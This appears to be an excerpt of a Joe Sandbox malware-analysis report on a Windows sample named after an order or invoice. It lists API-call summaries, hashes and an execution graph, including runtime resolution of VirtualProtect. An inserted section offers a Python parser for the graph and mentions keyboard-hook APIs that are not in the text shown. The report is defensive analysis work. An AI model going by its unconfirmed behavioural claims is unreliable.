                                        • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                        APIs
                                          • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                        • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                        • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                        • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                        • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@$memset
                                        • String ID:
                                        • API String ID: 1860491036-0
                                        • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                        • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                        • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                        • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                        APIs
                                        • wcslen.MSVCRT ref: 0040A8E2
                                          • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                          • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                          • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                        • free.MSVCRT ref: 0040A908
                                        • free.MSVCRT ref: 0040A92B
                                        • memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: free$memcpy$mallocwcslen
                                        • String ID:
                                        • API String ID: 726966127-0
                                        • Opcode ID: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                        • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                        • Opcode Fuzzy Hash: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                        • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                        APIs
                                        • wcslen.MSVCRT ref: 0040B1DE
                                        • free.MSVCRT ref: 0040B201
                                          • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                          • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                          • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                        • free.MSVCRT ref: 0040B224
                                        • memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: free$memcpy$mallocwcslen
                                        • String ID:
                                        • API String ID: 726966127-0
                                        • Opcode ID: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                        • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                        • Opcode Fuzzy Hash: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                        • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                        APIs
                                        • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                          • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                          • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                          • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                        • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                        • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                        • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcmp$memcpy
                                        • String ID:
                                        • API String ID: 231171946-0
                                        • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                        • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                        • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                        • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                        APIs
                                        • strlen.MSVCRT ref: 0040B0D8
                                        • free.MSVCRT ref: 0040B0FB
                                          • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                          • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                          • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                        • free.MSVCRT ref: 0040B12C
                                        • memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: free$memcpy$mallocstrlen
                                        • String ID:
                                        • API String ID: 3669619086-0
                                        • Opcode ID: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                        • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                        • Opcode Fuzzy Hash: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                        • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                        • malloc.MSVCRT ref: 00417407
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                        • free.MSVCRT ref: 00417425
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$freemalloc
                                        • String ID:
                                        • API String ID: 2605342592-0
                                        • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                        • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                        • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                        • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: wcslen$wcscat$wcscpy
                                        • String ID:
                                        • API String ID: 1961120804-0
                                        • Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                        • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                        • Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                        • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                        Execution Graph

                                         Execution Coverage: 2.4%
                                         Dynamic/Decrypted Code Coverage: 19.9%
                                         Signature Coverage: 0.5%
                                         Total number of Nodes: 868
                                         Total number of Limit Nodes: 22
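The execution_graph dump that follows is a flat stream of tokens: each node is "<5-digit id> <hex address> [summary]", where the summary is either "N API calls" or the imports the block calls, and each edge is "<src>-><dst>". Reading the unpacking path by eye (the routine at 44b3cf that resolves GetModuleHandleA, GetProcAddress and VirtualProtect, which is what the "changes PE section rights" signature reflects) is tedious, so the parser below turns the dump into nodes and successor lists and answers two questions a practitioner asks first: which imports are reachable from a given entry block, and what is the shortest block path to a chosen API. This is an added example, not code from the report or from Joe Sandbox; the token grammar is inferred from the dump itself, and the embedded excerpt is copied from this report's execution_graph section (two summary-only nodes plus the 44b3cf subgraph).

```python
"""Parser for the flattened execution_graph dump of a Joe Sandbox report.

Added example, not part of the report or of Joe Sandbox. The token format is
inferred from the dump: a node is "<5-digit id> <hex address> [summary]" and
an edge is "<src>-><dst>"; summaries are "N API calls" or a list of imports.
"""
import re
from collections import defaultdict, deque
from dataclasses import dataclass, field
from typing import Dict, List, Optional

NODE_ID = re.compile(r"^\d{5}$")
HEX_ADDR = re.compile(r"^[0-9a-f]{6,8}$")      # 6+ hex digits, never a 5-digit id
EDGE = re.compile(r"^(\d{5})->(\d{5})$")
IDENT = re.compile(r"^[A-Za-z_?][\w?@]*$")     # GetProcAddress, ??2@YAPAXI, __p__fmode
NOISE = {"API", "calls", "library"}            # words of "N API calls", not imports

# Excerpt copied from the report's execution_graph section: two summary-only
# nodes and the blocks of the routine at 44b3cf that resolves VirtualProtect
# via GetModuleHandleA/GetProcAddress.
SAMPLE = """
34101 40fc40 70 API calls 34274 403640 21 API calls
33173 44b3cf 33174 44b3e6 33173->33174 33179 44b454 33173->33179 33174->33179
33186 44b40e GetModuleHandleA 33174->33186 33176 44b45d GetModuleHandleA
33180 44b467 33176->33180 33177 44b49a 33199 44b49f 33177->33199
33179->33176 33179->33177 33179->33180 33180->33179
33181 44b487 GetProcAddress 33180->33181 33181->33179
33187 44b417 33186->33187 33189 44b454 33186->33189
33218 44b42b GetProcAddress 33187->33218 33192 44b49a 33189->33192
33193 44b49f 775 API calls 33192->33193 33193->33192
33219 44b454 33218->33219 33220 44b435 VirtualProtect 33218->33220
33221 44b444 VirtualProtect 33220->33221
"""


@dataclass
class Node:
    node_id: int
    address: str
    words: List[str] = field(default_factory=list)

    @property
    def summary(self) -> str:
        return " ".join(self.words)

    @property
    def apis(self) -> List[str]:
        """Import names in the summary; counts and filler words are dropped."""
        return [w for w in self.words if IDENT.match(w) and w not in NOISE]


@dataclass
class Graph:
    nodes: Dict[int, Node] = field(default_factory=dict)
    succ: Dict[int, List[int]] = field(default_factory=lambda: defaultdict(list))


def parse_execution_graph(text: str) -> Graph:
    """Tokenise the dump; a node starts at "<id> <address>", edges are "a->b"."""
    g = Graph()
    toks = text.split()
    cur: Optional[Node] = None
    i = 0
    while i < len(toks):
        tok = toks[i]
        m = EDGE.match(tok)
        if m:
            g.succ[int(m.group(1))].append(int(m.group(2)))
        elif NODE_ID.match(tok) and i + 1 < len(toks) and HEX_ADDR.match(toks[i + 1]):
            cur = Node(int(tok), toks[i + 1])
            g.nodes[cur.node_id] = cur
            i += 1                               # the address token is consumed too
        elif cur is not None:
            cur.words.append(tok)                # summary word of the current node
        i += 1
    return g


def reachable(g: Graph, start: int) -> List[int]:
    """Node ids reachable from start, in BFS order (start included)."""
    seen, order, queue = {start}, [], deque([start])
    while queue:
        n = queue.popleft()
        order.append(n)
        for s in g.succ.get(n, []):
            if s not in seen:
                seen.add(s)
                queue.append(s)
    return order


def reachable_apis(g: Graph, start: int) -> List[str]:
    """Sorted set of imports called by any block reachable from start."""
    found = set()
    for n in reachable(g, start):
        if n in g.nodes:
            found.update(g.nodes[n].apis)
    return sorted(found)


def path_to_api(g: Graph, start: int, api: str) -> List[str]:
    """Addresses on the shortest block path from start to a block calling api."""
    parent: Dict[int, Optional[int]] = {start: None}
    queue = deque([start])
    while queue:
        n = queue.popleft()
        if n in g.nodes and api in g.nodes[n].apis:
            path = []
            while n is not None:
                path.append(g.nodes[n].address if n in g.nodes else f"#{n}")
                n = parent[n]
            return path[::-1]
        for s in g.succ.get(n, []):
            if s not in parent:
                parent[s] = n
                queue.append(s)
    return []


def nodes_calling(g: Graph, api: str) -> List[str]:
    """Addresses of every block whose summary names the import."""
    return sorted(n.address for n in g.nodes.values() if api in n.apis)


if __name__ == "__main__":
    g = parse_execution_graph(SAMPLE)
    print("imports reachable from 44b3cf:", reachable_apis(g, 33173))
    print("path to VirtualProtect:", " -> ".join(path_to_api(g, 33173, "VirtualProtect")))
    print("blocks calling VirtualProtect:", nodes_calling(g, "VirtualProtect"))
```

On the excerpt this reports GetModuleHandleA, GetProcAddress and VirtualProtect as reachable from 44b3cf and the path 44b3cf -> 44b3e6 -> 44b40e -> 44b417 -> 44b42b -> 44b435 to the first VirtualProtect call; the same functions, fed the whole dump, let you pull every entry that reaches CreateFileA, RegisterClassA/CreateWindowExA or the keyboard-hook APIs without scrolling the graph.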
                                        execution_graph 34101 40fc40 70 API calls 34274 403640 21 API calls 34102 427fa4 42 API calls 34275 412e43 _endthreadex 34276 425115 76 API calls __fprintf_l 34277 43fe40 133 API calls 34105 425115 83 API calls __fprintf_l 34106 401445 memcpy memcpy DialogBoxParamA 34107 440c40 34 API calls 34109 411853 RtlInitializeCriticalSection memset 34110 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34283 40a256 13 API calls 34285 432e5b 17 API calls 34287 43fa5a 20 API calls 34112 401060 41 API calls 34290 427260 CloseHandle memset memset 33168 410c68 FindResourceA 33169 410c81 SizeofResource 33168->33169 33172 410cae 33168->33172 33170 410c92 LoadResource 33169->33170 33169->33172 33171 410ca0 LockResource 33170->33171 33170->33172 33171->33172 34292 405e69 14 API calls 34117 433068 15 API calls __fprintf_l 34294 414a6d 18 API calls 34295 43fe6f 134 API calls 34119 424c6d 15 API calls __fprintf_l 34296 426741 19 API calls 34121 440c70 17 API calls 34122 443c71 44 API calls 34125 427c79 24 API calls 34299 416e7e memset __fprintf_l 34129 42800b 47 API calls 34130 425115 85 API calls __fprintf_l 34302 41960c 61 API calls 34131 43f40c 122 API calls __fprintf_l 34134 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34135 43f81a 20 API calls 34137 414c20 memset memset 34138 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34306 414625 18 API calls 34307 404225 modf 34308 403a26 strlen WriteFile 34310 40422a 12 API calls 34314 427632 memset memset memcpy 34315 40ca30 59 API calls 34316 404235 26 API calls 34139 42ec34 61 API calls __fprintf_l 34140 425115 76 API calls __fprintf_l 34317 425115 77 API calls __fprintf_l 34319 44223a 38 API calls 34146 43183c 112 API calls 34320 44b2c5 _onexit __dllonexit 34325 42a6d2 memcpy __allrem 34148 405cda 65 API calls 34333 43fedc 138 API calls 34334 4116e1 16 API calls __fprintf_l 34151 4244e6 19 API calls 34153 42e8e8 127 API calls 
__fprintf_l 34154 4118ee RtlLeaveCriticalSection 34339 43f6ec 22 API calls 34156 425115 119 API calls __fprintf_l 33158 410cf3 EnumResourceNamesA 34342 4492f0 memcpy memcpy 34344 43fafa 18 API calls 34346 4342f9 15 API calls __fprintf_l 34157 4144fd 19 API calls 34348 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34349 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34352 443a84 _mbscpy 34354 43f681 17 API calls 34160 404487 22 API calls 34356 415e8c 16 API calls __fprintf_l 34164 411893 RtlDeleteCriticalSection __fprintf_l 34165 41a492 42 API calls 34360 403e96 34 API calls 34361 410e98 memset SHGetPathFromIDList SendMessageA 34167 426741 109 API calls __fprintf_l 34168 4344a2 18 API calls 34169 4094a2 10 API calls 34364 4116a6 15 API calls __fprintf_l 34365 43f6a4 17 API calls 34366 440aa3 20 API calls 34368 427430 45 API calls 34172 4090b0 7 API calls 34173 4148b0 15 API calls 34175 4118b4 RtlEnterCriticalSection 34176 4014b7 CreateWindowExA 34177 40c8b8 19 API calls 34179 4118bf RtlTryEnterCriticalSection 34373 42434a 18 API calls __fprintf_l 34375 405f53 12 API calls 34187 43f956 59 API calls 34189 40955a 17 API calls 34190 428561 36 API calls 34191 409164 7 API calls 34379 404366 19 API calls 34383 40176c ExitProcess 34386 410777 42 API calls 34196 40dd7b 51 API calls 34197 425d7c 16 API calls __fprintf_l 34388 43f6f0 25 API calls 34389 42db01 22 API calls 34198 412905 15 API calls __fprintf_l 34390 403b04 54 API calls 34391 405f04 SetDlgItemTextA GetDlgItemTextA 34392 44b301 ??3@YAXPAX 34395 4120ea 14 API calls 3 library calls 34396 40bb0a 8 API calls 34398 413f11 strcmp 34202 434110 17 API calls __fprintf_l 34205 425115 108 API calls __fprintf_l 34399 444b11 _onexit 34207 425115 76 API calls __fprintf_l 34210 429d19 10 API calls 34402 444b1f __dllonexit 34403 409f20 _strcmpi 34212 42b927 31 API calls 34406 433f26 19 API calls __fprintf_l 34407 44b323 FreeLibrary 34408 427f25 46 API calls 34409 43ff2b 17 API calls 34410 
43fb30 19 API calls 34219 414d36 16 API calls 34221 40ad38 7 API calls 34412 433b38 16 API calls __fprintf_l 34092 44b33b 34093 44b344 ??3@YAXPAX 34092->34093 34094 44b34b 34092->34094 34093->34094 34095 44b354 ??3@YAXPAX 34094->34095 34096 44b35b 34094->34096 34095->34096 34097 44b364 ??3@YAXPAX 34096->34097 34098 44b36b 34096->34098 34097->34098 34099 44b374 ??3@YAXPAX 34098->34099 34100 44b37b 34098->34100 34099->34100 34225 426741 21 API calls 34226 40c5c3 125 API calls 34228 43fdc5 17 API calls 34413 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34231 4161cb memcpy memcpy memcpy memcpy 33173 44b3cf 33174 44b3e6 33173->33174 33179 44b454 33173->33179 33174->33179 33186 44b40e GetModuleHandleA 33174->33186 33176 44b45d GetModuleHandleA 33180 44b467 33176->33180 33177 44b49a 33199 44b49f 33177->33199 33179->33176 33179->33177 33179->33180 33180->33179 33181 44b487 GetProcAddress 33180->33181 33181->33179 33182 44b405 33182->33179 33182->33180 33183 44b428 GetProcAddress 33182->33183 33183->33179 33184 44b435 VirtualProtect 33183->33184 33184->33179 33185 44b444 VirtualProtect 33184->33185 33185->33179 33187 44b417 33186->33187 33189 44b454 33186->33189 33218 44b42b GetProcAddress 33187->33218 33191 44b45d GetModuleHandleA 33189->33191 33192 44b49a 33189->33192 33198 44b467 33189->33198 33190 44b41c 33190->33189 33194 44b428 GetProcAddress 33190->33194 33191->33198 33193 44b49f 775 API calls 33192->33193 33193->33192 33194->33189 33195 44b435 VirtualProtect 33194->33195 33195->33189 33196 44b444 VirtualProtect 33195->33196 33196->33189 33197 44b487 GetProcAddress 33197->33189 33198->33189 33198->33197 33200 444c4a 33199->33200 33201 444c56 GetModuleHandleA 33200->33201 33202 444c68 __set_app_type __p__fmode __p__commode 33201->33202 33204 444cfa 33202->33204 33205 444d02 __setusermatherr 33204->33205 33206 444d0e 33204->33206 33205->33206 33227 444e22 _controlfp 33206->33227 33208 444d13 _initterm __getmainargs _initterm 33209 444d6a 
GetStartupInfoA 33208->33209 33211 444d9e GetModuleHandleA 33209->33211 33228 40cf44 33211->33228 33215 444dcf _cexit 33217 444e04 33215->33217 33216 444dc8 exit 33216->33215 33217->33177 33219 44b454 33218->33219 33220 44b435 VirtualProtect 33218->33220 33222 44b45d GetModuleHandleA 33219->33222 33223 44b49a 33219->33223 33220->33219 33221 44b444 VirtualProtect 33220->33221 33221->33219 33226 44b467 33222->33226 33224 44b49f 775 API calls 33223->33224 33224->33223 33225 44b487 GetProcAddress 33225->33226 33226->33219 33226->33225 33227->33208 33279 404a99 LoadLibraryA 33228->33279 33230 40cf60 33267 40cf64 33230->33267 33287 410d0e 33230->33287 33232 40cf6f 33291 40ccd7 ??2@YAPAXI 33232->33291 33234 40cf9b 33305 407cbc 33234->33305 33239 40cfc4 33323 409825 memset 33239->33323 33240 40cfd8 33328 4096f4 memset 33240->33328 33245 40d181 ??3@YAXPAX 33247 40d1b3 33245->33247 33248 40d19f DeleteObject 33245->33248 33246 407e30 _strcmpi 33249 40cfee 33246->33249 33352 407948 free free 33247->33352 33248->33247 33251 40cff2 RegDeleteKeyA 33249->33251 33252 40d007 EnumResourceTypesA 33249->33252 33251->33245 33254 40d047 33252->33254 33255 40d02f MessageBoxA 33252->33255 33253 40d1c4 33353 4080d4 free 33253->33353 33256 40d0a0 CoInitialize 33254->33256 33333 40ce70 33254->33333 33255->33245 33350 40cc26 strncat memset RegisterClassA CreateWindowExA 33256->33350 33260 40d1cd 33354 407948 free free 33260->33354 33262 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33351 40c256 PostMessageA 33262->33351 33264 40d061 ??3@YAXPAX 33264->33247 33268 40d084 DeleteObject 33264->33268 33265 40d09e 33265->33256 33267->33215 33267->33216 33268->33247 33271 40d0f9 GetMessageA 33272 40d17b CoUninitialize 33271->33272 33273 40d10d 33271->33273 33272->33245 33274 40d113 TranslateAccelerator 33273->33274 33276 40d145 IsDialogMessage 33273->33276 33277 40d139 IsDialogMessage 33273->33277 33274->33273 33275 40d16d GetMessageA 33274->33275 33275->33272 33275->33274 33276->33275 33278 40d157 
TranslateMessage DispatchMessageA 33276->33278 33277->33275 33277->33276 33278->33275 33280 404ac4 GetProcAddress 33279->33280 33281 404aec 33279->33281 33282 404ad4 33280->33282 33283 404add FreeLibrary 33280->33283 33285 404b13 33281->33285 33286 404afc MessageBoxA 33281->33286 33282->33283 33283->33281 33284 404ae8 33283->33284 33284->33281 33285->33230 33286->33230 33288 410d17 LoadLibraryA 33287->33288 33289 410d3c 33287->33289 33288->33289 33290 410d2b GetProcAddress 33288->33290 33289->33232 33290->33289 33292 40cd08 ??2@YAPAXI 33291->33292 33294 40cd26 33292->33294 33295 40cd2d 33292->33295 33362 404025 6 API calls 33294->33362 33297 40cd66 33295->33297 33298 40cd59 DeleteObject 33295->33298 33355 407088 33297->33355 33298->33297 33300 40cd6b 33358 4019b5 33300->33358 33303 4019b5 strncat 33304 40cdbf _mbscpy 33303->33304 33304->33234 33364 407948 free free 33305->33364 33307 407cf7 33310 407a1f malloc memcpy free free 33307->33310 33311 407ddc 33307->33311 33313 407d7a free 33307->33313 33318 407e04 33307->33318 33368 40796e 7 API calls 33307->33368 33369 406f30 33307->33369 33310->33307 33311->33318 33377 407a1f 33311->33377 33313->33307 33365 407a55 33318->33365 33319 407e30 33320 407e57 33319->33320 33321 407e38 33319->33321 33320->33239 33320->33240 33321->33320 33322 407e41 _strcmpi 33321->33322 33322->33320 33322->33321 33383 4097ff 33323->33383 33325 409854 33388 409731 33325->33388 33329 4097ff 3 API calls 33328->33329 33330 409723 33329->33330 33408 40966c 33330->33408 33422 4023b2 33333->33422 33338 40ced3 33511 40cdda 7 API calls 33338->33511 33339 40cece 33343 40cf3f 33339->33343 33463 40c3d0 memset GetModuleFileNameA strrchr 33339->33463 33343->33264 33343->33265 33346 40ceed 33490 40affa 33346->33490 33350->33262 33351->33271 33352->33253 33353->33260 33354->33267 33363 406fc7 memset _mbscpy 33355->33363 33357 40709f CreateFontIndirectA 33357->33300 33359 4019e1 33358->33359 33360 4019c2 strncat 33359->33360 33361 4019e5 memset LoadIconA 
33359->33361 33360->33359 33361->33303 33362->33295 33363->33357 33364->33307 33366 407a65 33365->33366 33367 407a5b free 33365->33367 33366->33319 33367->33366 33368->33307 33370 406f37 malloc 33369->33370 33371 406f7d 33369->33371 33373 406f73 33370->33373 33374 406f58 33370->33374 33371->33307 33373->33307 33375 406f6c free 33374->33375 33376 406f5c memcpy 33374->33376 33375->33373 33376->33375 33378 407a38 33377->33378 33379 407a2d free 33377->33379 33381 406f30 3 API calls 33378->33381 33380 407a43 33379->33380 33382 40796e 7 API calls 33380->33382 33381->33380 33382->33318 33399 406f96 GetModuleFileNameA 33383->33399 33385 409805 strrchr 33386 409814 33385->33386 33387 409817 _mbscat 33385->33387 33386->33387 33387->33325 33400 44b090 33388->33400 33393 40930c 3 API calls 33394 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33393->33394 33395 4097c5 LoadStringA 33394->33395 33396 4097db 33395->33396 33396->33395 33398 4097f3 33396->33398 33407 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33396->33407 33398->33245 33399->33385 33401 40973e _mbscpy _mbscpy 33400->33401 33402 40930c 33401->33402 33403 44b090 33402->33403 33404 409319 memset GetPrivateProfileStringA 33403->33404 33405 409374 33404->33405 33406 409364 WritePrivateProfileStringA 33404->33406 33405->33393 33406->33405 33407->33396 33418 406f81 GetFileAttributesA 33408->33418 33410 409675 33411 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33410->33411 33417 4096ee 33410->33417 33419 409278 GetPrivateProfileStringA 33411->33419 33413 4096c9 33420 409278 GetPrivateProfileStringA 33413->33420 33415 4096da 33421 409278 GetPrivateProfileStringA 33415->33421 33417->33246 33418->33410 33419->33413 33420->33415 33421->33417 33513 409c1c 33422->33513 33425 401e69 memset 33552 410dbb 33425->33552 33428 401ec2 33582 4070e3 strlen _mbscat _mbscpy _mbscat 33428->33582 33429 401ed4 33567 406f81 GetFileAttributesA 33429->33567 33432 401ee6 strlen strlen 33434 401f15 
